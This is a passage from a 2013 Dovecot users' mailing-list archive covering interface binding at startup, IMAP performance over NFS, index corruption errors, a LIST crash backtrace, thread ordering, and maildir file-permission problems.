sounds very plausible - can you maybe elaborate a bit on how you did this exactly? Would you say that it even makes sense to use a proxy-based migration if you're moving from one Dovecot installation (serving just IMAP) to another? I'm just asking because I'm planning to replace a FreeBSD-based Dovecot setup (serving just IMAP) to Debian. I already have the Debian system set up, but I'm still undecided how to do the move in a way which is a) preferrably transparent to users and b) possibly even allows me to quickly switch back to the old system again, just in case. -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From jeroen at massar.ch Mon Jun 10 18:50:36 2013 From: jeroen at massar.ch (Jeroen Massar) Date: Mon, 10 Jun 2013 08:50:36 -0700 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B5A045.2050006@open-t.co.uk> References: <51B5A045.2050006@open-t.co.uk> Message-ID: <51B5F5CC.9040201@massar.ch> On 2013-06-10 02:45, Sebastian Arcus wrote: > At the moment, if one of the interfaces specified with "listen=" in > dovecot.conf is not up when Dovecot is started, then Dovecot just > refuses to start. Is there an option to make Dovecot start anyway, and > just use the interface when it becomes available? It is inconvenient to > have Dovecot refuse to start during boot because some interface is > temporarily not available. > > Then again, maybe there is some strong security reasoning behind the way > Dovecot behaves at the moment? Depending on platform, but on Linux: sysctl -w net.ipv4.ip_nonlocal_bind = 1 And presto. Do note that figuring out that some applications are then misconfigured is a lot of fun, though 'netstat -anp' will help with that. (-p only as root on again Linuxes) Greets, Jeroen From shop at open-t.co.uk Mon Jun 10 22:04:05 2013 From: shop at open-t.co.uk (Sebastian Arcus) Date: Mon, 10 Jun 2013 20:04:05 +0100 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B5C32C.8050106@thelounge.net> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> Message-ID: <51B62325.6080403@open-t.co.uk> On 10/06/13 13:14, Reindl Harald wrote: > > Am 10.06.2013 11:45, schrieb Sebastian Arcus: >> At the moment, if one of the interfaces specified with "listen=" in dovecot.conf is not up when Dovecot is started, >> then Dovecot just refuses to start. Is there an option to make Dovecot start anyway, and just use the interface >> when it becomes available? It is inconvenient to have Dovecot refuse to start during boot because some interface is >> temporarily not available. >> >> Then again, maybe there is some strong security reasoning behind the way Dovecot behaves at the moment? > > the main question is why do you not order the start of your services correctly > how should a application bind to a specific interface if it is not up? The order of services is fine as it is. The problem is that if any of the interfaces Dovecot is supposed to be binding to is missing, Dovecot seems to refuse to start at all - instead of just binding to what is available. The openvpn service for example might have been reconfigured on a different IP. On next reboot, there is no imap server available for any interface. One of the network cards might go faulty. On next reboot - not imap server. Exim seems to be happy to start regardless of what is available - but I'm not sure of the intricacies of how they do it. From JLock at csolve.net Mon Jun 10 23:15:44 2013 From: JLock at csolve.net (Jason Lock) Date: Mon, 10 Jun 2013 20:15:44 +0000 Subject: [Dovecot] IMAP Message-ID: <8064532408EC2C48872677AD439020944272BA7E@CTIEXCH10.csolve.local> We are using version 1.2.17 and recently are experiencing major issues with performance, which we believe have isolated to IMAP sessions. We have 3 servers running Dovecot, with a central store shared via NFS. Things have been running quite well for months now, with the latest issues appearing within the last week. As an experiment have 2 of the server running and only accepting POP3 connecitons no IMAP, and the 3rd server only accepting IMAP connections and no POP3. When the issue occurred today, stopping dovecot on the IMAP only server allowed POP3 to resume to normal operations 5-10 minutes later. Leaving IMAP disabled for a period of time (about 30 mins) and then re-enabling seemed to worked the first time. Subsequent times, the issue appeared shortly after re-enabling IMAP. Our webmail solution connects via IMAP, so when disabled this also impact clients using the webmail. Running only POP3 while IMAP is disabled we do not appear to have any issues. At this point, looking for any advice. We believe the number of devices utilizing IMAP has increased significantly for us, and whether or not a specific device is the cause we have not been able to determine. Anyone else experiencing a similar problem that appears related to IMAP? From rick at havokmon.com Mon Jun 10 23:29:55 2013 From: rick at havokmon.com (Rick Romero) Date: Mon, 10 Jun 2013 15:29:55 -0500 Subject: [Dovecot] IMAP In-Reply-To: <8064532408EC2C48872677AD439020944272BA7E@CTIEXCH10.csolve.local> References: <8064532408EC2C48872677AD439020944272BA7E@CTIEXCH10.csolve.local> Message-ID: <20130610152955.Horde.1j-pfrIV2nq1NfTIreAsXQ9@beta.vfemail.net> Quoting Jason Lock : > We are using version 1.2.17 and recently are experiencing major issues > with performance, which we believe have isolated to IMAP sessions. > > We have 3 servers running Dovecot, with a central store shared via NFS.? > Things have been running quite well for months now, with the latest > issues appearing within the last week. > > As an experiment have 2 of the server running and only accepting POP3 > connecitons no IMAP, and the 3rd server only accepting IMAP connections > and no POP3. > > When the issue occurred today, stopping dovecot on the IMAP only server > allowed POP3 to resume to normal operations 5-10 minutes later.? Leaving > IMAP disabled for a period of time (about 30 mins) and then re-enabling > seemed to worked the first time.? Subsequent times, the issue appeared > shortly after re-enabling IMAP. > > Our webmail solution connects via IMAP, so when disabled this also > impact clients using the webmail. > > Running only POP3 while IMAP is disabled we do not appear to have any > issues. > > At this point, looking for any advice.? We believe the number of devices > utilizing IMAP has increased significantly for us, and whether or not a > specific device is the cause we have not been able to determine. > Anyone else experiencing a similar problem that appears related to IMAP? I'd suggest checking your I/O load on the NFS server.??? Especially If you have a need for that many front-end machines, that's the first place I'd check.? I'm not sure if Dovecot 1.x support it offhand, but moving the indexes to a local SSD on the IMAP only server might help if it's an I/O issue.. You could also try running IMAP on the NFS server - assuming it's capable. Personally, I had a hell of a time with certain versions of FreeBSD as an NFS Client. In my case the server that acted up was an SMTP server for incoming delivery only. For whatever reason, it would cause EXTREMELY slow access on the NFS host and drag everything down.?? This happened to me with both FreeBSD and OpenSolaris as the NFS host. I have no idea why, but an upgrade/rebuild fixed my issues. This probably isn't your issue, my problems cropped up almost immediately, but it's something to keep in mind.? Check your load on the NFS server first. Rick From john.ml at erba.tv Tue Jun 11 01:34:34 2013 From: john.ml at erba.tv (John Fawcett) Date: Tue, 11 Jun 2013 00:34:34 +0200 Subject: [Dovecot] dovecot corrupted transaction log Message-ID: <51B6547A.7050504@erba.tv> Hi I came across this error which happend immedately after a mail delivery to the inbox. Should I look for the problem externally to dovecot (ie. file system, operating system) or within dovecot? I never saw this error before installing 2.2.1, with 2.2.2 I seemed to get even more of them so currently back on 2.2.1 Thanks John Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: Corrupted transaction log file /var/vmail/mydomain/myemail at mydomain/dovecot.index.log seq 311: file size shrank (1184 < 1304) (sync_offset=1304) Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: Index /var/vmail/mydomain/myemail at mydomain/dovecot.index: Lost log for seq=310 offset=32816 Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Warning: fscking index file /var/vmail/mydomain/myemail at mydomain/dovecot.index Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: Index /var/vmail/mydomain/myemail at mydomain/dovecot.index: Lost log for seq=310 offset=32816 Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Warning: fscking index file /var/vmail/mydomain/myemail at mydomain/dovecot.index Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: /var/vmail/mydomain/myemail at mydomain/dovecot.index log position went backwards (310,32816 < 311,1304) Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: Index /var/vmail/mydomain/myemail at mydomain/dovecot.index: Lost log for seq=310 offset=32816 Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Warning: fscking index file /var/vmail/mydomain/myemail at mydomain/dovecot.index Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Disconnected: Internal error occurred. Refer to server log for more information. [2013-06-11 00:00:05] in=5596 out=27722 Jun 11 00:02:11 rosalia dovecot: imap-login: Login: user=, method=PLAIN, rip=81.174.4.175, lip=80.237.194.64, mpid=5824, TLS, session= Jun 11 00:02:11 rosalia dovecot: imap(myemail at mydomain): Error: Transaction log file /var/vmail/mydomain/myemail at mydomain/dovecot.index.log: marked corrupted From h.reindl at thelounge.net Tue Jun 11 02:21:30 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Tue, 11 Jun 2013 01:21:30 +0200 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B62325.6080403@open-t.co.uk> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> <51B62325.6080403@open-t.co.uk> Message-ID: <51B65F7A.2090901@thelounge.net> Am 10.06.2013 21:04, schrieb Sebastian Arcus: > On 10/06/13 13:14, Reindl Harald wrote: >> >> Am 10.06.2013 11:45, schrieb Sebastian Arcus: >>> At the moment, if one of the interfaces specified with "listen=" in dovecot.conf is not up when Dovecot is started, >>> then Dovecot just refuses to start. Is there an option to make Dovecot start anyway, and just use the interface >>> when it becomes available? It is inconvenient to have Dovecot refuse to start during boot because some interface is >>> temporarily not available. >>> >>> Then again, maybe there is some strong security reasoning behind the way Dovecot behaves at the moment? >> >> the main question is why do you not order the start of your services correctly >> how should a application bind to a specific interface if it is not up? > > The order of services is fine as it is. The problem is that if any of the interfaces Dovecot is supposed to be > binding to is missing, Dovecot seems to refuse to start at all where i work and config servers *i want* the to fail if the config is wrong > instead of just binding to what is available is not a predictable configuration if you specify ecplicit interfaces > openvpn service for example might have been reconfigured on a different IP so why the hell to you not config dovecot with "address = *" if you want this > On next reboot, there is no imap server available for any interface which is good because you recognize something goes wrong and if you want it to listen to "whatis available" avoid configs with specific interfaces > One of the network cards might go faulty. On next reboot - not imap server. so what - if hardware dies you normally want to know it instead hav eit somehow masqueraded > Exim seems to be happy to start regardless of what is available dovecot too as any other service if you configure it not explicitly for specific interfaces -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From shop at open-t.co.uk Tue Jun 11 10:00:06 2013 From: shop at open-t.co.uk (Sebastian Arcus) Date: Tue, 11 Jun 2013 08:00:06 +0100 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B65F7A.2090901@thelounge.net> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> <51B62325.6080403@open-t.co.uk> <51B65F7A.2090901@thelounge.net> Message-ID: <51B6CAF6.5070700@open-t.co.uk> On 11/06/13 00:21, Reindl Harald wrote: > > Am 10.06.2013 21:04, schrieb Sebastian Arcus: >> On 10/06/13 13:14, Reindl Harald wrote: >>> >>> Am 10.06.2013 11:45, schrieb Sebastian Arcus: >>>> At the moment, if one of the interfaces specified with "listen=" in dovecot.conf is not up when Dovecot is started, >>>> then Dovecot just refuses to start. Is there an option to make Dovecot start anyway, and just use the interface >>>> when it becomes available? It is inconvenient to have Dovecot refuse to start during boot because some interface is >>>> temporarily not available. >>>> >>>> Then again, maybe there is some strong security reasoning behind the way Dovecot behaves at the moment? >>> >>> the main question is why do you not order the start of your services correctly >>> how should a application bind to a specific interface if it is not up? >> >> The order of services is fine as it is. The problem is that if any of the interfaces Dovecot is supposed to be >> binding to is missing, Dovecot seems to refuse to start at all > > where i work and config servers *i want* the to fail if the config is wrong > >> instead of just binding to what is available > > is not a predictable configuration if you specify ecplicit interfaces > >> openvpn service for example might have been reconfigured on a different IP > > so why the hell to you not config dovecot with "address = *" if you want this Steady now. I was only asking a question. No need to burst a blood vessel over this. Some people prefer their systems to work slightly differently than others. It's the way of the world. Thank you for taking the time to answer. From rs at sys4.de Tue Jun 11 10:18:10 2013 From: rs at sys4.de (Robert Schetterer) Date: Tue, 11 Jun 2013 09:18:10 +0200 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B6CAF6.5070700@open-t.co.uk> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> <51B62325.6080403@open-t.co.uk> <51B65F7A.2090901@thelounge.net> <51B6CAF6.5070700@open-t.co.uk> Message-ID: <51B6CF32.1050005@sys4.de> Am 11.06.2013 09:00, schrieb Sebastian Arcus: > At the moment, if one of the interfaces specified with "listen=" in > dovecot.conf is not up when Dovecot is started, > then Dovecot just refuses to start. Is there an option to make Dovecot > start anyway, and just use the interface > when it becomes available? It is inconvenient to have Dovecot refuse to > start during boot because some interface is > temporarily not available. try write some wrapper to the dovecot start script , checking your interfaces and perhaps echo some stuff in dovecot.conf, or simply use -c option for starting another dovecot.conf but i would not recommand this practises Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From shop at open-t.co.uk Tue Jun 11 10:24:45 2013 From: shop at open-t.co.uk (Sebastian Arcus) Date: Tue, 11 Jun 2013 08:24:45 +0100 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B6CF32.1050005@sys4.de> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> <51B62325.6080403@open-t.co.uk> <51B65F7A.2090901@thelounge.net> <51B6CAF6.5070700@open-t.co.uk> <51B6CF32.1050005@sys4.de> Message-ID: <51B6D0BD.5090202@open-t.co.uk> On 11/06/13 08:18, Robert Schetterer wrote: > Am 11.06.2013 09:00, schrieb Sebastian Arcus: >> At the moment, if one of the interfaces specified with "listen=" in >> dovecot.conf is not up when Dovecot is started, >> then Dovecot just refuses to start. Is there an option to make Dovecot >> start anyway, and just use the interface >> when it becomes available? It is inconvenient to have Dovecot refuse to >> start during boot because some interface is >> temporarily not available. > > try write some wrapper to the dovecot start script , checking your > interfaces and perhaps echo some stuff in dovecot.conf, or simply use -c > option for starting another dovecot.conf > but i would not recommand this practises > > Thanks Robert. That's an interesting idea. It probably isn't really worth the hassle as the whole issue is not quite that important. I was merely wondering if there is a configuration option for Dovecot to ignore missing interfaces. Maybe coming from the other direction of the spectrum might also be a good idea - something like a "nolisten" option - to prevent it from listening on certain interfaces. That's the main reason I use the "listen" option - to prevent Dovecot from ever listening on certain interfaces, as an extra layer of protection in case the firewall ever gets misconfigured. From rs at sys4.de Tue Jun 11 11:52:34 2013 From: rs at sys4.de (Robert Schetterer) Date: Tue, 11 Jun 2013 10:52:34 +0200 Subject: [Dovecot] Wait for interface to become available instead of dying? In-Reply-To: <51B6D0BD.5090202@open-t.co.uk> References: <51B5A045.2050006@open-t.co.uk> <51B5C32C.8050106@thelounge.net> <51B62325.6080403@open-t.co.uk> <51B65F7A.2090901@thelounge.net> <51B6CAF6.5070700@open-t.co.uk> <51B6CF32.1050005@sys4.de> <51B6D0BD.5090202@open-t.co.uk> Message-ID: <51B6E552.5090804@sys4.de> Am 11.06.2013 09:24, schrieb Sebastian Arcus: > On 11/06/13 08:18, Robert Schetterer wrote: >> Am 11.06.2013 09:00, schrieb Sebastian Arcus: >>> At the moment, if one of the interfaces specified with "listen=" in >>> dovecot.conf is not up when Dovecot is started, >>> then Dovecot just refuses to start. Is there an option to make Dovecot >>> start anyway, and just use the interface >>> when it becomes available? It is inconvenient to have Dovecot refuse to >>> start during boot because some interface is >>> temporarily not available. >> >> try write some wrapper to the dovecot start script , checking your >> interfaces and perhaps echo some stuff in dovecot.conf, or simply use -c >> option for starting another dovecot.conf >> but i would not recommand this practises >> >> > Thanks Robert. That's an interesting idea. It probably isn't really > worth the hassle as the whole issue is not quite that important. I was > merely wondering if there is a configuration option for Dovecot to > ignore missing interfaces. > > Maybe coming from the other direction of the spectrum might also be a > good idea - something like a "nolisten" option - to prevent it from > listening on certain interfaces. That's the main reason I use the > "listen" option - to prevent Dovecot from ever listening on certain > interfaces, as an extra layer of protection in case the firewall ever > gets misconfigured. perhaps good idea , but i think it hasnt high prior, wait for Timos Statement Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From bind at enas.net Tue Jun 11 15:33:49 2013 From: bind at enas.net (Urban Loesch) Date: Tue, 11 Jun 2013 14:33:49 +0200 Subject: [Dovecot] Zlib plugin: changing compression save level Message-ID: <51B7192D.8010703@enas.net> Hi, I have running dovecot 2.1.15 with zlib plugin enabled and "zlib_save_level = 6" since about 2 years now without any problems. What happens if I now change the zlib_save_level to 9? Should that work without any problems, or become the current saved "*.m" files incompatible or unreadable? Thanks Urban From michael at bigmichi1.de Tue Jun 11 20:28:41 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Tue, 11 Jun 2013 19:28:41 +0200 Subject: [Dovecot] Connection closed by foreign host. Message-ID: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> i tried the latest dev version 2.2.2-0~auto54 for ubuntu and when i do some testing i got a connection closed. the commands are issued through telnet: root at i920:~# telnet localhost imap Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready. 1 LOGIN test at lokal.de 123456 1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS SPECIAL-USE BINARY MOVE NOTIFY COMPRESS=DEFLATE QUOTA ACL RIGHTS=texk] Logged in 2 LIST () "" (virtual/*) * LIST () "/" virtual/All * LIST () "/" virtual/Flagged * LIST (\UnMarked) "/" virtual/Flagged * LIST (\Marked) "/" virtual/All 2 OK List completed. 3 LIST () "" (*) Connection closed by foreign host. the command with number 3 results everytime in a connection closed. i turned on debug_log but nothing is shown there. From michael at bigmichi1.de Tue Jun 11 21:47:38 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Tue, 11 Jun 2013 20:47:38 +0200 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> Message-ID: <20130611204738.Horde.Yy9laasmgTDOmPpHKec0Fw4@horde.bigmichi1.de> (gdb) bt full #0 0x00007fbbfe71a015 in ?? () from /usr/lib/dovecot/libdovecot.so.0 No symbol table info available. #1 0x00007fbbfe701da5 in ?? () from /usr/lib/dovecot/libdovecot.so.0 No symbol table info available. #2 0x00007fbbfe70212d in buffer_write () from /usr/lib/dovecot/libdovecot.so.0 No symbol table info available. #3 0x00007fbbfe6efe9e in imap_utf8_to_utf7 () from /usr/lib/dovecot/libdovecot.so.0 No symbol table info available. #4 0x00007fbbfe9df778 in mailbox_list_default_get_storage_name () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #5 0x00007fbbfe9932df in ?? () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #6 0x00007fbbfe9e1856 in mailbox_list_get_storage () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #7 0x00007fbbfe993308 in ?? () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #8 0x00007fbbfe9e1856 in mailbox_list_get_storage () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. Zitat von Michael Cramer : > i tried the latest dev version 2.2.2-0~auto54 for ubuntu and when i do > some > testing i got a connection closed. > > the commands are issued through telnet: > > root at i920:~# telnet localhost imap > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE > IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready. > 1 LOGIN test at lokal.de 123456 > 1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE > IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS > THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN > NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH > ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS SPECIAL-USE BINARY > MOVE NOTIFY COMPRESS=DEFLATE QUOTA ACL RIGHTS=texk] Logged in > 2 LIST () "" (virtual/*) > * LIST () "/" virtual/All > * LIST () "/" virtual/Flagged > * LIST (\UnMarked) "/" virtual/Flagged > * LIST (\Marked) "/" virtual/All > 2 OK List completed. > 3 LIST () "" (*) > Connection closed by foreign host. > > the command with number 3 results everytime in a connection closed. i > turned on debug_log but nothing is shown there. From alec at alec.pl Wed Jun 12 09:53:33 2013 From: alec at alec.pl (A.L.E.C) Date: Wed, 12 Jun 2013 08:53:33 +0200 Subject: [Dovecot] THREAD REFERENCES bug Message-ID: <51B81AED.2000601@alec.pl> I found it on an ancient dovecot version, so it might be already fixed. Let's say I have a folder with 3 messages UID Subject Date 12 One 2013-06-09 11 Testmail 2013-06-10 14 Subject 2013-06-11 C: A0003 UID THREAD REFERENCES US-ASCII ALL S: * THREAD (12)(11)(14) Now I received a message with today's date (2013-06-12) with subject "Testmail" (the same as message with uid=11. The new message has uid=16. C: A0003 UID THREAD REFERENCES US-ASCII ALL S: * THREAD (12)((11)(16))(14) I expected 16 (or more likely 11 and 16) to be at the end of the result, after 14, i.e. (12)(14)((11)(16)). The problem for a user is when he has more messages in a folder. When user receives a new message sometimes (on subject duplicate) he will not see it because it will be somewhere in the middle of the result, but should be on top. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From alec at alec.pl Wed Jun 12 10:54:06 2013 From: alec at alec.pl (A.L.E.C) Date: Wed, 12 Jun 2013 09:54:06 +0200 Subject: [Dovecot] THREAD REFERENCES bug In-Reply-To: <51B81AED.2000601@alec.pl> References: <51B81AED.2000601@alec.pl> Message-ID: <51B8291E.4090506@alec.pl> On 06/12/2013 08:53 AM, A.L.E.C wrote: > C: A0003 UID THREAD REFERENCES US-ASCII ALL > S: * THREAD (12)((11)(16))(14) > > I expected 16 (or more likely 11 and 16) to be at the end of the result, > after 14, i.e. (12)(14)((11)(16)). I see the same in Cyrus. So, maybe this is how REFERENCES is supposed to work. RFC is not clear to me. I'm curious if THREAD=REFS works as I expect. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From lms.brubaker at gmail.com Wed Jun 12 11:45:30 2013 From: lms.brubaker at gmail.com (stefan novak) Date: Wed, 12 Jun 2013 10:45:30 +0200 Subject: [Dovecot] v2.2.0 released In-Reply-To: <0AC3CDEA-6252-4371-BD70-613F03D3C6D5@iki.fi> References: <1365787987.11047.246.camel@innu> <516C22F0.6060600@airstreamcomm.net> <11C42D8A-3EC2-4DA7-8DD8-94230284F8BE@iki.fi> <0AC3CDEA-6252-4371-BD70-613F03D3C6D5@iki.fi> Message-ID: is there any documentation about the obox plugin? is it already included in the 2.2.tar.gz? On 16 April 2013 22:42, Timo Sirainen wrote: > On 15.4.2013, at 19.16, Timo Sirainen wrote: > > > On 15.4.2013, at 18.55, list at airstreamcomm.net wrote: > > > >> Does the new obox plugin support any of the open source object storage > systems such as openstack, glusterfs, or ceph? From your store site it > does not appear so. > > > > Openstack Swift support is coming. There's a half-working version of it > already, would need just a day or two to finish it up. > > BTW. This is also done now, although not heavily tested yet. > > -- kind regards, Stefan _______________________ www.epb.at - Your IT Partner in East Austria From drew at sealedabstract.com Wed Jun 12 12:53:38 2013 From: drew at sealedabstract.com (Andrew Crawford) Date: Wed, 12 Jun 2013 04:53:38 -0500 Subject: [Dovecot] Permission denied / missing +r perm Message-ID: <68FF8205-BD27-4831-A112-55E74E64F2D7@sealedabstract.com> I have postfix configured to deliver mail to dovecot over lmtp into a mailbox that then is accessed over imap. The imap server is running as the user "mail". Whenever I run "postfix flush" I get in mail.log: > Jun 12 05:37:45 li212-205 dovecot: lmtp(21288): Connect from local > Jun 12 05:37:45 li212-205 spamd[18173]: prefork: child states: II > Jun 12 05:37:45 li212-205 dovecot: auth-worker(21289): mysql(127.0.0.1): Connected to database mailserver > Jun 12 05:37:45 li212-205 dovecot: lmtp(21288, drew at REDACTED): zXAqF2lBuFEoUwAA5SnFYQ: msgid=<064C5BC7-357B-4366-9A80-5001DBA21F62 at REDACTED>: saved mail to INBOX > Jun 12 05:37:45 li212-205 postfix/lmtp[21287]: 57BDA1CC932: to=, relay=li212-205.members.linode.com[private/dovecot-lmtp], delay=0.06, delays=0.01/0.01/0.01/0.03, dsn=2.0.0, status=sent (250 2.0.0 zXAqF2lBuFEoUwAA5SnFYQ Saved) > Jun 12 05:37:45 li212-205 dovecot: lmtp(21288): Disconnect from local: Client quit (in reset) > Jun 12 05:37:45 li212-205 postfix/qmgr[21244]: 57BDA1CC932: removed > Jun 12 05:37:45 li212-205 dovecot: imap(drew at REDACTED): Error: open(/decrypted-mail/awesomebox.sealedabstract.com/drew/cur/1371029865.M411903P21288.li212-205,S=2626,W=2673:2,) failed: Permission denied (euid=8(mail) egid=8(mail) missing +r perm: /decrypted-mail/awesomebox.sealedabstract.com/drew/cur/1371029865.M411903P21288.li212-205,S=2626,W=2673:2,, we're not in group 0(root)) > Jun 12 05:37:45 li212-205 dovecot: imap(drew at REDACTED): Disconnected: Internal error occurred. Refer to server log for more information. [2013-06-12 05:37:45] in=349 out=1084 Indeed, the file in question is owned by root and would not be accessible to the mail user: > ls -la /decrypted-mail/awesomebox.sealedabstract.com/drew/cur/ > total 24 > drwxrw---- 2 mail mail 4096 Jun 12 05:37 . > drwxrw---- 7 mail mail 4096 Jun 12 05:37 .. > -rw-rw---- 1 mail mail 2616 Jun 12 05:26 1371029196.M462737P20302.li212-205,S=2616,W=2662:2, > -rw-rw---- 1 mail mail 2635 Jun 12 05:32 1371029564.M454251P20747.li212-205,S=2635,W=2682:2, > -rw-rw---- 1 root root 2626 Jun 12 05:37 1371029865.M411903P21288.li212-205,S=2626,W=2673:2, So dutifully, I chown / chgrp to the mail user. But as soon as i receive a new mail, dovecot again creates files owned by root:root. How do I convince it to create files as mail:mail ? Diagnostic info: > $ dovecot --version > 2.1.7 > $ ps -aux | grep dovecot > root 20810 0.0 0.0 2892 984 ? Ss 05:34 0:00 /usr/sbin/dovecot -c /etc/dovecot/dovecot.conf > dovecot 20813 0.0 0.0 2620 940 ? S 05:34 0:00 dovecot/anvil > root 20814 0.0 0.1 2752 1072 ? S 05:34 0:00 dovecot/log > root 20818 0.0 0.2 4348 2524 ? S 05:34 0:00 dovecot/config > dovenull 21046 0.0 0.2 5248 2500 ? S 05:35 0:00 dovecot/imap-login > mail 21047 0.0 0.2 6392 2088 ? S 05:35 0:00 dovecot/imap > dovenull 21056 0.0 0.2 5248 2500 ? S 05:35 0:00 dovecot/imap-login > mail 21057 0.0 0.2 6752 2576 ? S 05:35 0:00 dovecot/imap > dovenull 21292 0.0 0.2 5248 2500 ? S 05:37 0:00 dovecot/imap-login > root 21293 0.0 0.1 4508 1044 ? S 05:37 0:00 dovecot/ssl-params > mail 21294 0.0 0.2 6540 2624 ? S 05:37 0:00 dovecot/imap > root 21400 0.0 0.0 4104 788 pts/0 S+ 05:51 0:00 grep dovecot > $ doveconf -n > # 2.1.7: /etc/dovecot/dovecot.conf > # OS: Linux 3.8.4-linode50 i686 Debian 7.0 fuse.encfs > auth_mechanisms = plain login > first_valid_uid = 0 > mail_location = maildir:/decrypted-mail/%d/%n > mail_privileged_group = mail > namespace inbox { > inbox = yes > location = > mailbox Drafts { > special_use = \Drafts > } > mailbox Junk { > special_use = \Junk > } > mailbox Sent { > special_use = \Sent > } > mailbox "Sent Messages" { > special_use = \Sent > } > mailbox Trash { > special_use = \Trash > } > prefix = > } > passdb { > args = /etc/dovecot/dovecot-sql.conf.ext > driver = sql > } > protocols = " imap lmtp" > service auth-worker { > user = mail > } > service auth { > unix_listener /var/spool/postfix/private/auth { > group = postfix > mode = 0600 > user = postfix > } > unix_listener auth-userdb { > mode = 0600 > user = mail > } > user = dovecot > } > service imap-login { > inet_listener imap { > port = 0 > } > } > service lmtp { > unix_listener /var/spool/postfix/private/dovecot-lmtp { > group = postfix > mode = 0666 > user = postfix > } > user = mail > } > service pop3-login { > inet_listener pop3 { > port = 0 > } > } > ssl = required > ssl_cert = ssl_key = userdb { > args = uid=mail gid=mail home=/decrypted-mail/%d/%n > driver = static > } > From CMarcus at Media-Brokers.com Wed Jun 12 13:08:09 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Wed, 12 Jun 2013 06:08:09 -0400 Subject: [Dovecot] v2.2.0 released In-Reply-To: References: <1365787987.11047.246.camel@innu> <516C22F0.6060600@airstreamcomm.net> <11C42D8A-3EC2-4DA7-8DD8-94230284F8BE@iki.fi> <0AC3CDEA-6252-4371-BD70-613F03D3C6D5@iki.fi> Message-ID: <51B84889.3090102@Media-Brokers.com> On 2013-06-12 4:45 AM, stefan novak wrote: > is there any documentation about the obox plugin? is it already included in > the 2.2.tar.gz? It is a *commercial* extension to dovecot - meaning, it costs money. http://shop.dovecot.fi/ I think it is an 